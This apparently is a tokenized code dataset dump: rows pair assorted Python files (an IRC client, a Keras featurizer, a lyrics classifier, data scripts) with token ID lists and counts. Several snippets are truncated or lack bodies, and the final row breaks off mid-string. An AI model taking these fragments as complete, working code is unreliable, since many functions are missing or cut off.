content stringlengths 1 1.04M | input_ids listlengths 1 774k | ratio_char_token float64 0.38 22.9 | token_count int64 1 774k |
|---|---|---|---|
import sys
import os
sys.path.append(os.path.abspath(os.path.join(os.path.abspath(''))))
from datk.model import ModelTrainer
pred_params = {
'cmd':'predict',
'data_path': './examples/test_titanic.csv'
}
ModelTrainer(**pred_params)
| [
198,
11748,
25064,
198,
11748,
28686,
198,
198,
17597,
13,
6978,
13,
33295,
7,
418,
13,
6978,
13,
397,
2777,
776,
7,
418,
13,
6978,
13,
22179,
7,
418,
13,
6978,
13,
397,
2777,
776,
7,
7061,
35514,
198,
198,
6738,
4818,
74,
13,
1... | 2.368932 | 103 |
'''
Created on Jun 7, 2021
@see: copied from https://github.com/martkartasev/sepconv/blob/master/src/loss.py
'''
import torch
import torchvision
from torch import nn
| [
7061,
6,
201,
198,
41972,
319,
7653,
767,
11,
33448,
201,
198,
201,
198,
31,
3826,
25,
18984,
422,
3740,
1378,
12567,
13,
785,
14,
13822,
74,
433,
589,
85,
14,
325,
79,
42946,
14,
2436,
672,
14,
9866,
14,
10677,
14,
22462,
13,
9... | 2.521127 | 71 |
#!/usr/bin/python3
# this script extract citations mentioned in the dbSNP database
import json
import bz2
output_file = "pmid_annotations_dbsnp.txt"
f_out = open(output_file, "w")
file_list1 = ['refsnp-chr' + str(i) for i in list(range(1,23)) + ['MT', 'X', 'Y']]
file_list = ["./data/" + base_file_name + ".json.bz2" for base_file_name in file_list1]
total_count = 0
for input_file in file_list:
print(input_file)
with bz2.BZ2File(input_file, 'rb') as f_in:
for line in f_in:
rs_obj = json.loads(line.decode('utf-8'))
rsid = rs_obj['refsnp_id']
citations = rs_obj['citations']
for citation in citations:
f_out.write(str(citation) + "\t" + rsid + "\n")
total_count += 1
print("Total annotations: " + str(total_count))
| [
2,
48443,
14629,
14,
8800,
14,
29412,
18,
198,
198,
2,
428,
4226,
7925,
33499,
4750,
287,
262,
20613,
15571,
47,
6831,
198,
198,
11748,
33918,
198,
11748,
275,
89,
17,
198,
198,
22915,
62,
7753,
796,
366,
4426,
312,
62,
34574,
602,
... | 2.160105 | 381 |
from metaflow import FlowSpec, step, conda_base, Parameter,\
current, resources, Flow, Run
from itertools import chain, combinations
@conda_base(python='3.8.10', libraries={'pyarrow': '5.0.0',
'python-annoy': '1.17.0'})
if __name__ == '__main__':
MovieRecsFlow()
| [
6738,
1138,
1878,
9319,
1330,
27782,
22882,
11,
2239,
11,
1779,
64,
62,
8692,
11,
25139,
2357,
11,
59,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1459,
11,
4133,
11,
... | 2.049689 | 161 |
from util import *
from math import sqrt
class Vol(object):
"""
Vol is the basic building block of all data in a net.
it is essentially just a 3D volume of numbers, with a
width (sx), height (sy), and depth (depth).
It is used to hold data for all filters, all volumes,
all weights, and also stores all gradients w.r.t.
the data. c is optionally a value to initialize the volume
with. If c is missing, fills the Vol with random numbers.
"""
__repr__ = __str__
@property | [
6738,
7736,
1330,
1635,
198,
6738,
10688,
1330,
19862,
17034,
198,
198,
4871,
4709,
7,
15252,
2599,
628,
220,
220,
220,
37227,
198,
220,
220,
220,
4709,
318,
262,
4096,
2615,
2512,
286,
477,
1366,
287,
257,
2010,
13,
198,
220,
220,
... | 3.083333 | 168 |
from pygame import *
#Классы
#Сцена
back = (200,255,255)
window = display.set_mode((600,500))
window.fill(back)
#fps
clock = time.Clock()
FPS = 60
#Цикл
game = True
while game:
for e in event.get():
if e.type == QUIT:
game = False
display.update()
clock.tick(FPS)
| [
6738,
12972,
6057,
1330,
1635,
201,
198,
2,
140,
248,
30143,
16142,
21727,
21727,
45035,
201,
198,
220,
201,
198,
220,
201,
198,
201,
198,
2,
140,
94,
141,
228,
16843,
22177,
16142,
201,
198,
1891,
796,
357,
2167,
11,
13381,
11,
133... | 1.820652 | 184 |
pkgname = "efivar"
pkgver = "37"
pkgrel = 0
build_style = "makefile"
make_cmd = "gmake"
make_build_target = "all"
make_build_args = ["libdir=/usr/lib", "ERRORS="]
make_install_args = ["libdir=/usr/lib"]
make_check_target = "test"
hostmakedepends = ["pkgconf", "gmake"]
makedepends = ["linux-headers"]
pkgdesc = "Tools and libraries to work with EFI variables"
maintainer = "q66 <q66@chimera-linux.org>"
license = "LGPL-2.1-or-later"
url = "https://github.com/rhboot/efivar"
source = f"{url}/releases/download/{pkgver}/{pkgname}-{pkgver}.tar.bz2"
sha256 = "3c67feb93f901b98fbb897d5ca82931a6698b5bcd6ac34f0815f670d77747b9f"
tool_flags = {"CFLAGS": ["-D_GNU_SOURCE"]}
@subpackage("libefivar")
@subpackage("efivar-devel")
| [
35339,
3672,
796,
366,
891,
452,
283,
1,
198,
35339,
332,
796,
366,
2718,
1,
198,
35339,
2411,
796,
657,
198,
11249,
62,
7635,
796,
366,
15883,
7753,
1,
198,
15883,
62,
28758,
796,
366,
70,
15883,
1,
198,
15883,
62,
11249,
62,
167... | 2.307692 | 312 |
# -*- coding: utf-8 -*-
# Copyright (c) 2008 Alberto García Hierro <fiam@rm-fr.net>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""Classes encapsulating Wapi functions into more abstracted containers"""
import re
from wapi.exceptions import ApiMissingParam
NAMESPACE_RE = re.compile('(.*)__.*?')
class ApiFunction(object):
"""Encapsulates a Wapi function"""
@property
def requires_login(self):
"""Wheter the function requires a logged-in user"""
return hasattr(self.func, 'requires_login') and self.func.requires_login
@property
def endpoint(self):
"""Returns the function endpoint used by the RestBinding"""
return self.name.replace('__', '/')
@property
def is_read(self):
"""Wheter the function can be called as a read function"""
return not getattr(self.func, '_write_only_', False)
@property
def is_write(self):
"""Wheter the function can be called as a write function"""
return not getattr(self.func, '_read_only_', False)
@property
def documented(self):
"""Wheter the function should be documented"""
return not getattr(self.func, '_undocumented_', False)
def namespace(self):
"""Returns the namespace this function belongs to"""
match = NAMESPACE_RE.match(self.name)
if match:
return match.group(1)
return u''
class ApiNamespace(object):
"""Container grouping multiple functions into the same namespace"""
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
15069,
357,
66,
8,
3648,
40649,
16364,
29690,
36496,
305,
1279,
69,
1789,
31,
26224,
12,
8310,
13,
3262,
29,
198,
198,
2,
2448,
3411,
318,
29376,
7520,
11,
1... | 3.116481 | 807 |
from detectron2.engine.train_loop import HookBase
from dafne.utils.rtpt import RTPT
| [
6738,
4886,
1313,
17,
13,
18392,
13,
27432,
62,
26268,
1330,
18531,
14881,
198,
6738,
288,
1878,
710,
13,
26791,
13,
17034,
457,
1330,
371,
7250,
51,
628
] | 3.035714 | 28 |
from platform import python_branch
from time import time
import cv2
from init import *
| [
6738,
3859,
1330,
21015,
62,
1671,
3702,
198,
6738,
640,
1330,
640,
198,
11748,
269,
85,
17,
198,
6738,
2315,
1330,
1635,
628,
198
] | 3.708333 | 24 |
SERVICE_NAME_MAP = {}
PROFILE_NAME_MAP = {}
SUBSTRATE_NAME_MAP = {}
PACKAGE_NAME_MAP = {}
DEPLOYMENT_NAME_MAP = {}
def get_service_name(name):
"""returns the class name used for entity ref"""
global SERVICE_NAME_MAP
return SERVICE_NAME_MAP.get(name, None)
def update_service_name(ui_name, dsl_name):
"""updates the ui and dsl name mapping"""
global SERVICE_NAME_MAP
SERVICE_NAME_MAP[ui_name] = dsl_name
def get_profile_name(name):
"""returns the class name used for entity ref"""
global PROFILE_NAME_MAP
return PROFILE_NAME_MAP.get(name, None)
def get_substrate_name(name):
"""returns the class name used for entity ref"""
global SUBSTRATE_NAME_MAP
return SUBSTRATE_NAME_MAP.get(name, None)
def get_package_name(name):
"""returns the class name used for entity ref"""
global PACKAGE_NAME_MAP
return PACKAGE_NAME_MAP.get(name, None)
def get_deployment_name(name):
"""returns the class name used for entity ref"""
global DEPLOYMENT_NAME_MAP
return DEPLOYMENT_NAME_MAP.get(name, None)
| [
35009,
27389,
62,
20608,
62,
33767,
796,
23884,
198,
31190,
25664,
62,
20608,
62,
33767,
796,
23884,
198,
50,
10526,
18601,
6158,
62,
20608,
62,
33767,
796,
23884,
198,
47,
8120,
11879,
62,
20608,
62,
33767,
796,
23884,
198,
7206,
6489,... | 2.699248 | 399 |
import logging
import argparse
logging.getLogger().setLevel(logging.INFO)
| [
11748,
18931,
198,
11748,
1822,
29572,
198,
198,
6404,
2667,
13,
1136,
11187,
1362,
22446,
2617,
4971,
7,
6404,
2667,
13,
10778,
8,
628
] | 3.166667 | 24 |
import asyncio
import collections
import importlib
import logging
import random
import ssl
from blinker import signal
loop = asyncio.get_event_loop()
connections = {}
plugins = []
signal("plugin-registered").connect(plugin_registered_handler)
class User:
"""
Represents a user on IRC, with their nickname, username, and hostname.
"""
@classmethod
class IRCProtocolWrapper:
"""
Wraps an IRCProtocol object to allow for automatic reconnection. Only used
internally.
"""
class IRCProtocol(asyncio.Protocol):
"""
Represents a connection to IRC.
"""
## Core helper functions
def process_queue(self):
"""
Pull data from the pending messages queue and send it. Schedule ourself
to be executed again later.
"""
if not self.work: return
if self.queue:
self._writeln(self.queue.pop(0))
loop.call_later(self.queue_timer, self.process_queue)
def _writeln(self, line):
"""
Send a raw message to IRC immediately.
"""
if not isinstance(line, bytes):
line = line.encode("utf-8")
self.logger.debug(line)
self.transport.write(line + b"\r\n")
signal("irc-send").send(line.decode())
def writeln(self, line):
"""
Queue a message for sending to the currently connected IRC server.
"""
self.queue.append(line)
return self
def register(self, nick, user, realname, mode="+i", password=None):
"""
Queue registration with the server. This includes sending nickname,
ident, realname, and password (if required by the server).
"""
self.nick = nick
self.user = user
self.realname = realname
self.mode = mode
self.password = password
return self
def _register(self):
"""
Send registration messages to IRC.
"""
if self.password:
self.writeln("PASS {}".format(self.password))
self.writeln("USER {0} {1} {0} :{2}".format(self.user, self.mode, self.realname))
self.writeln("NICK {}".format(self.nick))
self.logger.debug("Sent registration information")
signal("registration-complete").send(self)
self.nickname = self.nick
## protocol abstractions
def join(self, channels):
"""
Join channels. Pass a list to join all the channels, or a string to
join a single channel. If registration with the server is not yet
complete, this will queue channels to join when registration is done.
"""
if not isinstance(channels, list):
channels = [channels]
channels_str = ",".join(channels)
if not self.registration_complete:
self.channels_to_join.append(channels_str)
else:
self.writeln("JOIN {}".format(channels_str))
return self
def part(self, channels):
"""
Leave channels. Pass a list to leave all the channels, or a string to
leave a single channel. If registration with the server is not yet
complete, you're dumb.
"""
if not isinstance(channels, list):
channels = [channels]
channels_str = ",".join(channels)
self.writeln("PART {}".format(channels_str))
def say(self, target_str, message):
"""
Send a PRIVMSG to IRC.
Carriage returns and line feeds are stripped to prevent bugs.
"""
message = message.replace("\n", "").replace("\r", "")
while message:
self.writeln("PRIVMSG {} :{}".format(target_str, message[:400]))
message = message[400:]
def do(self, target_str, message):
"""
Send an ACTION to IRC. Must not be longer than 400 chars.
Carriage returns and line feeds are stripped to prevent bugs.
"""
if len(message) <= 400:
message = message.replace("\n", "").replace("\r", "")
self.writeln("PRIVMSG {} :\x01ACTION {}\x01".format(target_str, message[:400]))
def nick_in_use_handler(self):
"""
Choose a nickname to use if the requested one is already in use.
"""
s = "a{}".format("".join([random.choice("0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ") for i in range(8)]))
return s
## catch-all
# def __getattr__(self, attr):
# if attr in self.__dict__:
# return self.__dict__[attr]
# def _send_command(self, *args):
# argstr = " ".join(args[:-1]) + " :{}".format(args[-1])
# self.writeln("{} {}".format(attr.upper(), argstr))
# _send_command.__name__ == attr
# return _send_command
def connect(server, port=6697, use_ssl=True):
"""
Connect to an IRC server. Returns a proxy to an IRCProtocol object.
"""
connector = loop.create_connection(IRCProtocol, host=server, port=port, ssl=use_ssl)
transport, protocol = loop.run_until_complete(connector)
protocol.wrapper = IRCProtocolWrapper(protocol)
protocol.server_info = {"host": server, "port": port, "ssl": use_ssl}
protocol.netid = "{}:{}:{}{}".format(id(protocol), server, port, "+" if use_ssl else "-")
signal("netid-available").send(protocol)
connections[protocol.netid] = protocol.wrapper
return protocol.wrapper
def disconnected(client_wrapper):
"""
Either reconnect the IRCProtocol object, or exit, depending on
configuration. Called by IRCProtocol when we lose the connection.
"""
client_wrapper.protocol.work = False
client_wrapper.logger.critical("Disconnected from {}. Attempting to reconnect...".format(client_wrapper.netid))
signal("disconnected").send(client_wrapper.protocol)
if not client_wrapper.protocol.autoreconnect:
import sys
sys.exit(2)
connector = loop.create_connection(IRCProtocol, **client_wrapper.server_info)
def reconnected(f):
"""
Callback function for a successful reconnection.
"""
client_wrapper.logger.critical("Reconnected! {}".format(client_wrapper.netid))
_, protocol = f.result()
protocol.register(client_wrapper.nick, client_wrapper.user, client_wrapper.realname, client_wrapper.mode, client_wrapper.password)
protocol.channels_to_join = client_wrapper.channels_to_join
protocol.server_info = client_wrapper.server_info
protocol.netid = client_wrapper.netid
protocol.wrapper = client_wrapper
signal("netid-available").send(protocol)
client_wrapper.protocol = protocol
getattr(asyncio, 'async')(connector).add_done_callback(reconnected)
signal("connection-lost").connect(disconnected)
import asyncirc.plugins.core
| [
11748,
30351,
952,
198,
11748,
17268,
198,
11748,
1330,
8019,
198,
11748,
18931,
198,
11748,
4738,
198,
11748,
264,
6649,
198,
6738,
21019,
263,
1330,
6737,
198,
26268,
796,
30351,
952,
13,
1136,
62,
15596,
62,
26268,
3419,
198,
198,
84... | 2.510583 | 2,693 |
from lf3py.aws.firehose import FireHose
| [
6738,
300,
69,
18,
9078,
13,
8356,
13,
6495,
71,
577,
1330,
3764,
39,
577,
628
] | 2.5625 | 16 |
# 环境变量配置,用于控制是否使用GPU
# 说明文档:https://paddlex.readthedocs.io/zh_CN/develop/appendix/parameters.html#gpu
import os
os.environ['CUDA_VISIBLE_DEVICES'] = '0'
import numpy as np
import cv2
from PIL import Image
from collections import OrderedDict
import paddlex as pdx
import paddlex.utils.logging as logging
from paddlex.cv.models.utils.seg_eval import ConfusionMatrix
model_dir = 'output/deeplabv3p_mobilenetv3_large_ssld/best_model'
img_file = "dataset/JPEGImages/5.png"
label_file = "dataset/Annotations/5_class.png"
model = pdx.load_model(model_dir)
conf_mat = ConfusionMatrix(model.num_classes, streaming=True)
# API说明:https://paddlex.readthedocs.io/zh_CN/develop/apis/models/semantic_segmentation.html#overlap-tile-predict
overlap_tile_predict = model.overlap_tile_predict(
img_file=img_file, tile_size=(769, 769), pad_size=[64, 64], batch_size=32)
label = np.asarray(Image.open(label_file))
update_confusion_matrix(conf_mat, overlap_tile_predict, label)
category_iou, miou = conf_mat.mean_iou()
category_acc, macc = conf_mat.accuracy()
logging.info(
"miou={:.6f} category_iou={} macc={:.6f} category_acc={} kappa={:.6f}".
format(miou, category_iou, macc, category_acc, conf_mat.kappa()))
| [
2,
13328,
236,
107,
161,
95,
225,
20998,
246,
34932,
237,
165,
227,
235,
163,
121,
106,
171,
120,
234,
18796,
101,
12859,
236,
162,
236,
100,
26344,
114,
42468,
28938,
99,
45635,
18796,
101,
33346,
198,
2,
5525,
107,
112,
23626,
236... | 2.291115 | 529 |
import warnings
from .buffer import Buffer
from .prioritized_buffer import WeightTree, PrioritizedBuffer
try:
from .buffer_d import DistributedBuffer
from .prioritized_buffer_d import DistributedPrioritizedBuffer
except ImportError as _:
warnings.warn(
"Failed to import buffers relying on torch.distributed." " Set them to None."
)
DistributedBuffer = None
DistributedPrioritizedBuffer = None
__all__ = [
"Buffer",
"DistributedBuffer",
"PrioritizedBuffer",
"DistributedPrioritizedBuffer",
"WeightTree",
]
| [
11748,
14601,
198,
6738,
764,
22252,
1330,
47017,
198,
6738,
764,
3448,
273,
36951,
62,
22252,
1330,
14331,
27660,
11,
14481,
36951,
28632,
198,
198,
28311,
25,
198,
220,
220,
220,
422,
764,
22252,
62,
67,
1330,
4307,
6169,
28632,
198,
... | 3.111111 | 180 |
import re
import struct
import os
import sys
import time
import json
USAGE = """
python refine.py INPUT_DIR OUTPUT_DIR
"""
if __name__ == '__main__':
if len(sys.argv) != 3:
print(USAGE)
else:
print time.strftime('%H:%M:%S')
extract_dir(sys.argv[1], sys.argv[2])
print time.strftime('%H:%M:%S')
| [
11748,
302,
198,
11748,
2878,
198,
11748,
28686,
198,
11748,
25064,
198,
11748,
640,
198,
11748,
33918,
198,
198,
2937,
11879,
796,
37227,
198,
220,
220,
220,
21015,
35139,
13,
9078,
3268,
30076,
62,
34720,
16289,
30076,
62,
34720,
198,
... | 2.125 | 160 |
# -*- coding: utf-8 -*-
from django.contrib import admin
from .models import NotificationTrackingRecord, SnapshotRecord, StoredEventRecord
admin.site.register(StoredEventRecord)
admin.site.register(SnapshotRecord)
admin.site.register(NotificationTrackingRecord)
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
198,
6738,
764,
27530,
1330,
42808,
2898,
5430,
23739,
11,
16026,
9442,
23739,
11,
520,
1850,
9237,
23739,
198,
198,
... | 3.341772 | 79 |
#### Get libraries
import requests
import re
from bs4 import BeautifulSoup
from collections import Counter
import pandas as pd
from sklearn.feature_extraction.text import CountVectorizer
from nltk.tokenize import word_tokenize
from nltk.stem import WordNetLemmatizer
from sklearn.pipeline import make_pipeline
from sklearn.model_selection import GridSearchCV
from sklearn.model_selection import train_test_split
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import TfidfTransformer
from sklearn.feature_extraction.text import TfidfVectorizer
from imblearn.under_sampling import RandomUnderSampler, NearMiss
import numpy as np
from sklearn.naive_bayes import MultinomialNB
from PIL import Image
from sklearn.linear_model import LogisticRegression
import argparse
from matplotlib import pyplot as plt
import wordcloud
parser = argparse.ArgumentParser(description='Predicts to what band input lyrics snippets belong to. The code works for Dream Theater, Angra and King Crimson')
parser.add_argument("-v", "--verbosity", help="increase output verbosity",
action="store_true")
args = parser.parse_args()
if args.verbosity:
print("verbosity turned on")
def load_data():
"""The function loads the data and specifies the model that will be estimated.#
"""
df = pd.read_csv('data/output.csv')
df = df.dropna()
corpus = df['Lyrics'].to_list()
for words in corpus:
words.split()
labels = df['Artist'].to_list()
X = corpus
y = labels
return X, y
def feature_engineering(X):
"""The function performs feature engineering
"""
tf_vec = TfidfVectorizer(stop_words= ['is'])
tv_vec = tf_vec.fit(X)
X_trans = tf_vec.transform(X).todense()
return X_trans, tf_vec
def train_model(X, y):
"""
Trains a scikit-learn classification model on text.
Parameters
----------
text : list
labels : list
Returns
-------
model : Trained scikit-learn model.
"""
tf_vec = TfidfVectorizer()
nb = MultinomialNB(alpha = 1)
model = make_pipeline(tf_vec, nb)
model.fit(X, y)
return model
def build_model_RF():
"""
The function builds a machine the machine learning model. First, the pipeline is created, then the parameters dictionary is
created, and lastly the grid search object is built.
Input:
None
Output:
Grid search object
"""
m = RandomForestClassifier(class_weight = "balanced", random_state = 42)
parameters = {'max_depth':[10, 50, 100],'n_estimators':[50, 100, 200]}
cv = GridSearchCV(m, param_grid = parameters)
return cv
##### Make prediction
if __name__ == '__main__':
main() | [
4242,
3497,
12782,
198,
198,
11748,
7007,
198,
11748,
302,
198,
6738,
275,
82,
19,
1330,
23762,
50,
10486,
198,
6738,
17268,
1330,
15034,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
1341,
35720,
13,
30053,
62,
2302,
7861,
13,
523... | 2.742409 | 1,021 |
import os
import pandas as pd
from gym_brt.data.config.configuration import FREQUENCY
from matplotlib import pyplot as plt
| [
11748,
28686,
198,
198,
11748,
19798,
292,
355,
279,
67,
198,
6738,
11550,
62,
1671,
83,
13,
7890,
13,
11250,
13,
11250,
3924,
1330,
44253,
10917,
45155,
198,
6738,
2603,
29487,
8019,
1330,
12972,
29487,
355,
458,
83,
628,
628,
198
] | 3.121951 | 41 |
import re
in_path = "../res/freq_map.csv"
out_path = "../res/empty_bigrams.csv"
with open(in_path) as f:
data = f.read()
data = [[int(j) for j in i.split(",")] for i in data.split("\n")]
empty_bigrams = []
for i,row in enumerate(data):
for j,col in enumerate(row):
if data[i][j] is 0:
empty_bigrams.append(chr(i + 97) + chr(j + 97))
with open(out_path, "w") as f:
f.write(",".join(empty_bigrams))
| [
11748,
302,
201,
198,
201,
198,
259,
62,
6978,
796,
366,
40720,
411,
14,
19503,
80,
62,
8899,
13,
40664,
1,
201,
198,
448,
62,
6978,
796,
366,
40720,
411,
14,
28920,
62,
14261,
9474,
13,
40664,
1,
201,
198,
201,
198,
4480,
1280,
... | 2.026786 | 224 |
# -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import copy
from typing import Type, Union
import scrapy
from scrapy.http.response import Response
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.python.failure import Failure
from .const import REDIRECT_TIMES, REDIRECT_URLS
from .utils import failure_to_status, origin_url, response_to_status
| [
2,
532,
9,
12,
19617,
25,
3384,
69,
12,
23,
532,
9,
12,
198,
198,
2,
2896,
500,
994,
262,
4981,
329,
534,
15881,
276,
3709,
198,
2,
198,
2,
4091,
10314,
287,
25,
198,
2,
3740,
1378,
31628,
13,
1416,
2416,
88,
13,
2398,
14,
2... | 3.124183 | 153 |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
SNAKE_TO_CAMEL_CASE_TABLE = {
"allow_concurrent_executions": "allowConcurrentExecutions",
"api_version": "apiVersion",
"auth_token": "authToken",
"command_ordering_strategy": "commandOrderingStrategy",
"continue_on_error": "continueOnError",
"default_node_executor_plugin": "defaultNodeExecutorPlugin",
"default_node_file_copier_plugin": "defaultNodeFileCopierPlugin",
"execution_enabled": "executionEnabled",
"extra_config": "extraConfig",
"group_name": "groupName",
"key_material": "keyMaterial",
"log_level": "logLevel",
"max_thread_count": "maxThreadCount",
"node_filter_exclude_precedence": "nodeFilterExcludePrecedence",
"node_filter_query": "nodeFilterQuery",
"preserve_options_order": "preserveOptionsOrder",
"project_name": "projectName",
"rank_attribute": "rankAttribute",
"rank_order": "rankOrder",
"resource_model_sources": "resourceModelSources",
"schedule_enabled": "scheduleEnabled",
"ssh_authentication_type": "sshAuthenticationType",
"ssh_key_file_path": "sshKeyFilePath",
"ssh_key_storage_path": "sshKeyStoragePath",
"success_on_empty_node_filter": "successOnEmptyNodeFilter",
"ui_url": "uiUrl",
}
CAMEL_TO_SNAKE_CASE_TABLE = {
"allowConcurrentExecutions": "allow_concurrent_executions",
"apiVersion": "api_version",
"authToken": "auth_token",
"commandOrderingStrategy": "command_ordering_strategy",
"continueOnError": "continue_on_error",
"defaultNodeExecutorPlugin": "default_node_executor_plugin",
"defaultNodeFileCopierPlugin": "default_node_file_copier_plugin",
"executionEnabled": "execution_enabled",
"extraConfig": "extra_config",
"groupName": "group_name",
"keyMaterial": "key_material",
"logLevel": "log_level",
"maxThreadCount": "max_thread_count",
"nodeFilterExcludePrecedence": "node_filter_exclude_precedence",
"nodeFilterQuery": "node_filter_query",
"preserveOptionsOrder": "preserve_options_order",
"projectName": "project_name",
"rankAttribute": "rank_attribute",
"rankOrder": "rank_order",
"resourceModelSources": "resource_model_sources",
"scheduleEnabled": "schedule_enabled",
"sshAuthenticationType": "ssh_authentication_type",
"sshKeyFilePath": "ssh_key_file_path",
"sshKeyStoragePath": "ssh_key_storage_path",
"successOnEmptyNodeFilter": "success_on_empty_node_filter",
"uiUrl": "ui_url",
}
| [
2,
19617,
28,
40477,
12,
23,
198,
2,
17202,
39410,
25,
428,
2393,
373,
7560,
416,
262,
21624,
12994,
24118,
687,
10290,
357,
27110,
5235,
8,
16984,
13,
17202,
198,
2,
17202,
2141,
407,
4370,
416,
1021,
4556,
345,
821,
1728,
345,
760... | 2.764211 | 950 |
import sentry_sdk
from app.config import CONFIG
if __name__ == "__main__":
# Init Sentry before any app imports
sentry_sdk.init(server_name=CONFIG.DEVICE_ID)
from app import init
init.run()
| [
11748,
1908,
563,
62,
21282,
74,
198,
6738,
598,
13,
11250,
1330,
25626,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
1303,
44707,
11352,
563,
878,
597,
598,
17944,
198,
220,
220,
220,
1908,
... | 2.679487 | 78 |
"""
This file deals with building the actual featurizer:
1. Initializing the InceptionV3 model
2. Decapitating it to the appropriate depth
3. Downsampling, if desired
The integrated function is the build_featurizer function, which takes the depth,
a flag signalling downsampling, and the number of features to downsample to.
"""
import logging
import os
import warnings
import trafaret as t
from keras.applications import InceptionV3, ResNet50, VGG16, VGG19, Xception
from keras.engine.topology import InputLayer
from keras.layers import GlobalAvgPool2D, Lambda, average
from keras.models import Model
import keras.backend as K
from .squeezenet import SqueezeNet
if K.backend() != 'tensorflow':
logging.warn('Without a tensorflow backend, SqueezeNet and Xception will not be '
' available. Please initialize ImageFeaturizer with either vgg16, vgg19, '
'resnet50, or inceptionv3.')
supported_model_types = {
'squeezenet': {
'label': 'SqueezeNet',
'class': SqueezeNet,
'kwargs': {'weights': None},
'depth': {1: 5, 2: 12, 3: 19, 4: 26}
},
'inceptionv3': {
'label': 'InceptionV3',
'class': InceptionV3,
'kwargs': {},
'depth': {1: 2, 2: 19, 3: 33, 4: 50}
},
'vgg16': {
'label': 'VGG16',
'class': VGG16,
'kwargs': {},
'depth': {1: 1, 2: 2, 3: 4, 4: 8}
},
'vgg19': {
'label': 'VGG19',
'class': VGG19,
'kwargs': {},
'depth': {1: 1, 2: 2, 3: 4, 4: 9}
},
'resnet50': {
'label': 'ResNet50',
'class': ResNet50,
'kwargs': {},
'depth': {1: 2, 2: 5, 3: 13, 4: 23}
},
'xception': {
'label': 'Xception',
'class': Xception,
'kwargs': {},
'depth': {1: 1, 2: 8, 3: 18, 4: 28}
}
}
@t.guard(model_str=t.Enum(*supported_model_types.keys()),
loaded_weights=t.String(allow_blank=True))
def _initialize_model(model_str, loaded_weights=''):
"""
Initialize the InceptionV3 model with the saved weights, or
if the weight file can't be found, load them automatically through Keras.
Parameters:
----------
model_str : str
String deciding which model to use for the featurizer
Returns:
-------
model : keras.models.Model
The initialized model loaded with pre-trained weights
"""
logging.info('Loading/downloading {model_label} model weights. '
'This may take a minute first time.'
.format(model_label=supported_model_types[model_str]['label']))
if loaded_weights != '':
model = supported_model_types[model_str]['class'](weights=None)
try:
model.load_weights(loaded_weights)
except IOError as err:
logging.error('Problem loading the custom weights. If not an advanced user, please '
'leave loaded_weights unconfigured.')
raise err
else:
model = supported_model_types[model_str]['class'](**supported_model_types
[model_str]['kwargs'])
if model_str == 'squeezenet':
# Special case for squeezenet - we already have weights for it
this_dir, this_filename = os.path.split(__file__)
model_path = os.path.join(this_dir,
'saved_models',
'squeezenet_weights_tf_dim_ordering_tf_kernels.h5')
if not os.path.isfile(model_path):
raise ValueError('Could not find the weights. Download another model'
' or replace the SqueezeNet weights in the model folder.')
model.load_weights(model_path)
logging.info('Model successfully initialized.')
return model
@t.guard(model=t.Type(Model), depth=t.Int(gte=1))
def _decapitate_model(model, depth):
"""
Cut off end layers of a model equal to the depth of the desired outputs,
and then remove the links connecting the new outer layer to the old ones.
Parameters:
----------
model: keras.models.Model
The model being decapitated. Note: original model is not changed, method returns new model.
depth: int
The number of layers to pop off the top of the network
Returns:
-------
model: keras.models.Model
Decapitated model.
"""
# -------------- #
# ERROR CHECKING #
# Make sure the depth isn't greater than the number of layers (minus input)
if depth >= len(model.layers) - 1:
raise ValueError('Can\'t go deeper than the number of layers in the model. Tried to pop '
'{} layers, but model only has {}'.format(depth, len(model.layers) - 1))
if not isinstance(model.layers[0], InputLayer):
warnings.warn('First layer of the model is not an input layer. Beware of depth issues.')
# -------------------------------------------------------- #
# Get the intermediate output
new_model_output = model.layers[(depth + 1) * -1].output
new_model = Model(inputs=model.input, outputs=new_model_output)
new_model.layers[-1].outbound_nodes = []
return new_model
@t.guard(features=t.Any(), num_pooled_features=t.Int(gte=1))
def _find_pooling_constant(features, num_pooled_features):
"""
Given a tensor and an integer divisor for the desired downsampled features,
this will downsample the tensor to the desired number of features
Parameters:
----------
features : Tensor
the layer output being downsampled
num_pooled_features : int
the desired number of features to downsample to
Returns:
-------
int
the integer pooling constant required to correctly splice the layer output for downsampling
"""
# Initializing the outputs
num_features = features.shape[-1].__int__()
# Find the pooling constant
pooling_constant = num_features / float(num_pooled_features)
# -------------- #
# ERROR CHECKING #
if pooling_constant < 1:
raise ValueError(
'You can\'t downsample to a number bigger than the original feature space.')
# Check that the number of downsampled features is an integer divisor of the original output
if not pooling_constant.is_integer():
# Store recommended downsample
recommended_downsample = num_features / int(pooling_constant)
raise ValueError('Trying to downsample features to non-integer divisor: '
'from {} to {}.\n\n Did you mean to downsample to'
